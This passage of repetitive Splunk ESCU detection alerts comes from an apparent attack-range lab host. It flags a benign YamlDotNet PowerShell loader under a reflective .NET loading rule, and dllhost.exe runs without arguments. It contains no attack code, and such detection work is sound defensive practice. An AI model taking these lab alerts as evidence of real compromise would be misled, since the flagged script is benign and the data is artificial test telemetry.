EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664718931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664718931, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664712000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664712000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1104", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664712000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664712000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x450", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664715333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664715333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664715333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664715333, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T11:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T11:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match 